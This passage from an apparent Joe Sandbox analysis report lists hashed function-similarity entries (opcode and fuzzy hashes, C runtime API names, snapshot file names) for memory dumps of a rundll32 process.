                                                                                                                                                                                • Opcode Fuzzy Hash: 4ee676152d8a6d3fc2897e1a750d37abcf8e05a29651dc9c84745b4ac20e915c
                                                                                                                                                                                • Instruction Fuzzy Hash: 7B313072208F8081EB12DB65E5403DE67E2F794BA8F585322DE5A577EBDE78C846C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 885392049-3145022300
                                                                                                                                                                                • Opcode ID: 61d228dc35f4783f95f4f267f4efbd83b46e62b23daaabd50ddf3d7b4201f6b8
                                                                                                                                                                                • Instruction ID: 6eafa2257de7c2ba966b0a9e4bb0febdc8e55ae4348b3b8e92eef774e0eeddb0
                                                                                                                                                                                • Opcode Fuzzy Hash: 61d228dc35f4783f95f4f267f4efbd83b46e62b23daaabd50ddf3d7b4201f6b8
                                                                                                                                                                                • Instruction Fuzzy Hash: 16314372248FC091EB12DB25E9503DE67E2E794BA8F544322DE69477EBDE38C486C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 885392049-3145022300
                                                                                                                                                                                • Opcode ID: 9ba023ed03df909f6066c7b5c14fd05801aa9986d2c2f223f424258040ee7ccc
                                                                                                                                                                                • Instruction ID: f0178516104e068482de89b901d71a4eb93256dbd09ed36b490c413ded78c97a
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ba023ed03df909f6066c7b5c14fd05801aa9986d2c2f223f424258040ee7ccc
                                                                                                                                                                                • Instruction Fuzzy Hash: C1310072298FC091EB16DB25E4503DE67E2F794BA8F544322DE59476EBDE38C886C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 885392049-3145022300
                                                                                                                                                                                • Opcode ID: f8706b51eb17ae2e159a5494a8dec2db18e3578be03e998b402b1e0e9252aa95
                                                                                                                                                                                • Instruction ID: cf4b8fabb418654a01dc07700bf489c4b92b92475badee13ae1e314b9ab53d26
                                                                                                                                                                                • Opcode Fuzzy Hash: f8706b51eb17ae2e159a5494a8dec2db18e3578be03e998b402b1e0e9252aa95
                                                                                                                                                                                • Instruction Fuzzy Hash: 37314E31608F8082EB13AB25E5503DE67E3E794BA8F544321DE59476EBDE34C585C710
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 885392049-3145022300
                                                                                                                                                                                • Opcode ID: ace5dc31f61c09f8b1992fbad1866961798bcf55ab3e40703d2c29ce2fc2ab2b
                                                                                                                                                                                • Instruction ID: 5eb98628480a0ff954441504672278d0581db0ff0ced42192bab1ca1a42fde4e
                                                                                                                                                                                • Opcode Fuzzy Hash: ace5dc31f61c09f8b1992fbad1866961798bcf55ab3e40703d2c29ce2fc2ab2b
                                                                                                                                                                                • Instruction Fuzzy Hash: CF315272608F8081FB12DB25E8403DE67E2F795BA8F584322DE59476EBDE38C486C740
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                                • API String ID: 885392049-3145022300
                                                                                                                                                                                • Opcode ID: 59c119c6cd78f5f12ab19a5a93b0e181c0794a7f240d0e73d8738324ff7228fb
                                                                                                                                                                                • Instruction ID: e9f5163c72be80b21427cdf4f0100e011007279c9c4c9cdb4af06d64ad6b91ee
                                                                                                                                                                                • Opcode Fuzzy Hash: 59c119c6cd78f5f12ab19a5a93b0e181c0794a7f240d0e73d8738324ff7228fb
                                                                                                                                                                                • Instruction Fuzzy Hash: A0311932308F8086EB53AB65E5503DD67E2F794BA8F584322DE5947AEBDE35C4468700
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_errno
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2288870239-0
                                                                                                                                                                                • Opcode ID: b4bc968d3c6e0ca3411d4d7c887ffc2f2a0207fe4ca6a95d778c9ae964d27bd5
                                                                                                                                                                                • Instruction ID: 2aeb50d900ac689e42663660248337ea74b751e1fe79ac77526c7274b666d70f
                                                                                                                                                                                • Opcode Fuzzy Hash: b4bc968d3c6e0ca3411d4d7c887ffc2f2a0207fe4ca6a95d778c9ae964d27bd5
                                                                                                                                                                                • Instruction Fuzzy Hash: AC410E74254E5A4FFB94FB58D8A5BA932F2F755319F4C049CE806C21A1CBAC88858B91
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                • API String ID: 1037122555-1018135373
                                                                                                                                                                                • Opcode ID: f0fb30d1909b450c6e57b082ed5d02df015822f95b1b763569599858bfad4588
                                                                                                                                                                                • Instruction ID: 2662b6626f8cc5e538ae745435f85f99aff5b7b9d6b253613c23aac3f9502b16
                                                                                                                                                                                • Opcode Fuzzy Hash: f0fb30d1909b450c6e57b082ed5d02df015822f95b1b763569599858bfad4588
                                                                                                                                                                                • Instruction Fuzzy Hash: B1215076208A9186E731DB55F08039E73E1F384B69F044216DF9A0B796CB39D446CB10
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2523592665-0
                                                                                                                                                                                • Opcode ID: caada0040375c754c365269c74eac08a2c7c6ecaf5709b2b132bd05a7a63ca1e
                                                                                                                                                                                • Instruction ID: d77569c719a7df54751fb8bf3b3285b1fa3c1bf7352077391f93820ea9629730
                                                                                                                                                                                • Opcode Fuzzy Hash: caada0040375c754c365269c74eac08a2c7c6ecaf5709b2b132bd05a7a63ca1e
                                                                                                                                                                                • Instruction Fuzzy Hash: FF618132309F9093EB22DB16E95079E37E2F7847A8F444226DE4D47B92EF38C9658740
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1573762532-0
                                                                                                                                                                                • Opcode ID: 54267be0af5665c456a7c7659a763348ac507c77e1cf2204fcfa820cb5cdd029
                                                                                                                                                                                • Instruction ID: bd529e62f9a7d899aa4397e24001249d7d2c887dc1719d9bb619c9d2ce012945
                                                                                                                                                                                • Opcode Fuzzy Hash: 54267be0af5665c456a7c7659a763348ac507c77e1cf2204fcfa820cb5cdd029
                                                                                                                                                                                • Instruction Fuzzy Hash: 9751FD3C514E898BEB64A719C4413FA73F2FB94319F9D015EAC8AC71D5D7349A41C286
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: codecvtshared_ptr
                                                                                                                                                                                • String ID: bad conversion
                                                                                                                                                                                • API String ID: 864914841-2629740042
                                                                                                                                                                                • Opcode ID: f686c19bb21e7c99195cfd856166b89ac244ed319bd7e827f4bfb7f3c19f572a
                                                                                                                                                                                • Instruction ID: 1a985ca1f82125a99a93f9eb599ca88b5548a5f016bf0d1f4816f1dd5abe97ae
                                                                                                                                                                                • Opcode Fuzzy Hash: f686c19bb21e7c99195cfd856166b89ac244ed319bd7e827f4bfb7f3c19f572a
                                                                                                                                                                                • Instruction Fuzzy Hash: 51911872209EC485EB72DB15E4413DEA3A2F795788F800516EACD83BABDF79C484CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 781512312-0
                                                                                                                                                                                • Opcode ID: 18b03093d7903f9cb9c0e6ccd3bd8cd556307edb59b32dac925bc1e85bd82eca
                                                                                                                                                                                • Instruction ID: 63057bb3e9775a2afc53709cead6b881712edd413fb99e2cc8733c9eb7068c25
                                                                                                                                                                                • Opcode Fuzzy Hash: 18b03093d7903f9cb9c0e6ccd3bd8cd556307edb59b32dac925bc1e85bd82eca
                                                                                                                                                                                • Instruction Fuzzy Hash: 6241263C414F9A4BEBA4AB1DC0447FEB3F2FB90339F9C065EAC95C71D5DA2489819681
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1573762532-0
                                                                                                                                                                                • Opcode ID: e6115aaee9bd6988ad82c43c6dd58144aeb0dd506a0ad067c6414fbe19083d80
                                                                                                                                                                                • Instruction ID: f3c6b39d136c2b79fb91cd3432b99b81d15d91764d28db9b63e3f375a79f2153
                                                                                                                                                                                • Opcode Fuzzy Hash: e6115aaee9bd6988ad82c43c6dd58144aeb0dd506a0ad067c6414fbe19083d80
                                                                                                                                                                                • Instruction Fuzzy Hash: 3F41E372A08AD581EF76AB11D5803FD73E2E740BDCF886213DE99876C7E728C9418720
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 781512312-0
                                                                                                                                                                                • Opcode ID: dfee2ec86327835073bb60d14cfa61aec5f3f40ef22b560a8e2aa4c0f90f1485
                                                                                                                                                                                • Instruction ID: 95f8a0967e85029ee295f082f8bfb91aabb9bcc854a8c801ca7cc00d8c35636b
                                                                                                                                                                                • Opcode Fuzzy Hash: dfee2ec86327835073bb60d14cfa61aec5f3f40ef22b560a8e2aa4c0f90f1485
                                                                                                                                                                                • Instruction Fuzzy Hash: 6741D572618AE182FB67AB11D4403FD73E2E354BA8F944227EE940B6C6EB38C951D710
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LockitLockit::_std::_$Getfacet__int64_lockstd::locale::_
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1826629674-0
                                                                                                                                                                                • Opcode ID: a7a86c66bce9f8c002374eae96e0059bdcbbf72b2e3551aa10e057cb6c724dea
                                                                                                                                                                                • Instruction ID: e77bf9e1e67002fa5e8f3abeef6e2e5df85b73962c6e243fe935239b75c9b779
                                                                                                                                                                                • Opcode Fuzzy Hash: a7a86c66bce9f8c002374eae96e0059bdcbbf72b2e3551aa10e057cb6c724dea
                                                                                                                                                                                • Instruction Fuzzy Hash: 4731DC30518E899FD790EB18D484B9EB7F2FB98314F540A1EB48EC31A1DB74D984CB42
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LockitLockit::_std::_$Getfacet__int64_lockstd::locale::_
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1826629674-0
                                                                                                                                                                                • Opcode ID: 475c35bb957f92cb08b03fdb3f7c4018d5127f34752569f9ef8619f3a0f66de7
                                                                                                                                                                                • Instruction ID: e4731660be9c491bbe34f97965e8e5b8620b24488f497defdba797816d58b009
                                                                                                                                                                                • Opcode Fuzzy Hash: 475c35bb957f92cb08b03fdb3f7c4018d5127f34752569f9ef8619f3a0f66de7
                                                                                                                                                                                • Instruction Fuzzy Hash: FB31FE30518E899FDB90EB18D448B9EB7F1FB98319F540A1DB48DD31A1DA74D984CB42
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3191669884-0
                                                                                                                                                                                • Opcode ID: ec2a6dd435b50d5e993b3328a406cbf0fc12b9938289ae1a38fd3c4af6446b14
                                                                                                                                                                                • Instruction ID: 1153c50df163867a2b016f80a14d1af6f674d6291741001ef77c41cc479d17f4
                                                                                                                                                                                • Opcode Fuzzy Hash: ec2a6dd435b50d5e993b3328a406cbf0fc12b9938289ae1a38fd3c4af6446b14
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C318271608BC085FB629B51D484BED77E6E784BE4F544222EE58477C6EB74C852CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _getptd
                                                                                                                                                                                • String ID: MOC$RCC$csm
                                                                                                                                                                                • API String ID: 3186804695-2671469338
                                                                                                                                                                                • Opcode ID: 79c6bdfdf6facc246eee842b2de7a644aa034f1ac0e2309a20206dc5bd345c8d
                                                                                                                                                                                • Instruction ID: f22b8ed72df623a6f3613ff22ed48f27963e83d340d553a2ec41d014acb573ec
                                                                                                                                                                                • Opcode Fuzzy Hash: 79c6bdfdf6facc246eee842b2de7a644aa034f1ac0e2309a20206dc5bd345c8d
                                                                                                                                                                                • Instruction Fuzzy Hash: ADF030356189A4C6E7A73B64E0C53EC33E2E794B0DF898661DA140A78397BC4585CA22
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Mtx_guardMtx_guard::~_std::ios_base::getlocstrcspn$Mpunctchar_traitslocaleconv
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1081295294-0
                                                                                                                                                                                • Opcode ID: 80fff96529f72534f19313b91b76645ccdf41dfbacd5eccac0a68e6ac0f0d792
                                                                                                                                                                                • Instruction ID: a6a3e9fa4e9b8ff827aa2d9864bcd9324611e1f64289bdf8d13210fef8088ff3
                                                                                                                                                                                • Opcode Fuzzy Hash: 80fff96529f72534f19313b91b76645ccdf41dfbacd5eccac0a68e6ac0f0d792
                                                                                                                                                                                • Instruction Fuzzy Hash: CAF1AF30A18E9C8FDB54EF68C4517EDB7F2EF68304F54015DE88ED7292DA3099458B81
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: char_traits$GetfacetLockitLockit::___int64ctypestd::_std::ios_base::getlocstd::ios_base::widthstd::locale::_std::locale::locale
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3820056732-0
                                                                                                                                                                                • Opcode ID: f7d4b075ec16be0e298c79dab2fc69bc85944e118794892976690d5cb4385092
                                                                                                                                                                                • Instruction ID: f4b282d75741d9118330c27a9850603a6fe0ea231c5f4110ede085518f5af92b
                                                                                                                                                                                • Opcode Fuzzy Hash: f7d4b075ec16be0e298c79dab2fc69bc85944e118794892976690d5cb4385092
                                                                                                                                                                                • Instruction Fuzzy Hash: D8E1B134218F899FEBA4EB68C0457AEB7F1FF99345F44491EA48ED72A1DB74D4808702
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::ios_base::getlocstrcspn$Mpunctlocaleconv
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 897058063-0
                                                                                                                                                                                • Opcode ID: e6d4c13a13f37a2c0e240a87e1a0af4942c429ab79be8636b1550a59db188ce2
                                                                                                                                                                                • Instruction ID: 84593c9b8397877573ef0c7672b3667ab14dc1d362fe1068386a634ac8227159
                                                                                                                                                                                • Opcode Fuzzy Hash: e6d4c13a13f37a2c0e240a87e1a0af4942c429ab79be8636b1550a59db188ce2
                                                                                                                                                                                • Instruction Fuzzy Hash: D0E17A36704E808AEB128FB5C4413EE63F2EB59B8CF954115DE5967B9AEF38C54AC340
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::ios_base::getlocstrcspn$Mpunctlocaleconv
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 897058063-0
                                                                                                                                                                                • Opcode ID: 519f33cb95e0d99ee0d4355dc84f9f0201176b2b605b694342907c18314ab85a
                                                                                                                                                                                • Instruction ID: a1af7d892ea29e43908eb487914d860451c7fb0eea8c450adf9b4dfa85a25489
                                                                                                                                                                                • Opcode Fuzzy Hash: 519f33cb95e0d99ee0d4355dc84f9f0201176b2b605b694342907c18314ab85a
                                                                                                                                                                                • Instruction Fuzzy Hash: 4CE17932704E8089EB128FB5D4413ED63B2FB59B8CF954216DE495BB9AEF38C54AC340
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::ios_base::getlocstrcspn$Mpunctlocaleconv
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 897058063-0
                                                                                                                                                                                • Opcode ID: 249c8184b0c50b0624f1531bd89af645a8e4f17256f81473f5670aed722e2b0a
                                                                                                                                                                                • Instruction ID: 33f0e23e14594105b5141e53f6fc11c356581ca7db60f957386dd6333d82086e
                                                                                                                                                                                • Opcode Fuzzy Hash: 249c8184b0c50b0624f1531bd89af645a8e4f17256f81473f5670aed722e2b0a
                                                                                                                                                                                • Instruction Fuzzy Hash: 9AD14936B19E8489EB129BB5D0503EC67B2F749B8CF945115DE8967B8BDF38C186C380
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: char_traits
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1158913984-0
                                                                                                                                                                                • Opcode ID: 76944e2627019ce81bd9c091a5413294dd97fbccb27d42a7feae6066973e9caa
                                                                                                                                                                                • Instruction ID: f5ba18c5af19b59e8029fe6c3d2a47a99159508ff02380c51180ce86f570e139
                                                                                                                                                                                • Opcode Fuzzy Hash: 76944e2627019ce81bd9c091a5413294dd97fbccb27d42a7feae6066973e9caa
                                                                                                                                                                                • Instruction Fuzzy Hash: FEC11A31118FC98AE764EB25C4557EEB3F2FF95305F44091EA8CEC31A2DA719984CB42
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: char_traits$Lockitstd::_$GetfacetLockit::_Lockit::~___int64ctypestd::ios_base::getlocstd::ios_base::widthstd::locale::_std::locale::locale
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2740546168-0
                                                                                                                                                                                • Opcode ID: a07e37d6cc49bf2a2ce72d55d671cce5715a6d797d1835dc9c2bdc10f607b4b5
                                                                                                                                                                                • Instruction ID: a12c7b46dc357d85a7d3679f5929e02979f9b8325fddc99a7178ac71c0b75802
                                                                                                                                                                                • Opcode Fuzzy Hash: a07e37d6cc49bf2a2ce72d55d671cce5715a6d797d1835dc9c2bdc10f607b4b5
                                                                                                                                                                                • Instruction Fuzzy Hash: 5AC1A936209FC485DB61DB55E4913AEB7E1F7C8B88F408516EA8E47B6ADF7CD4808B10
                                                                                                                                                                                APIs
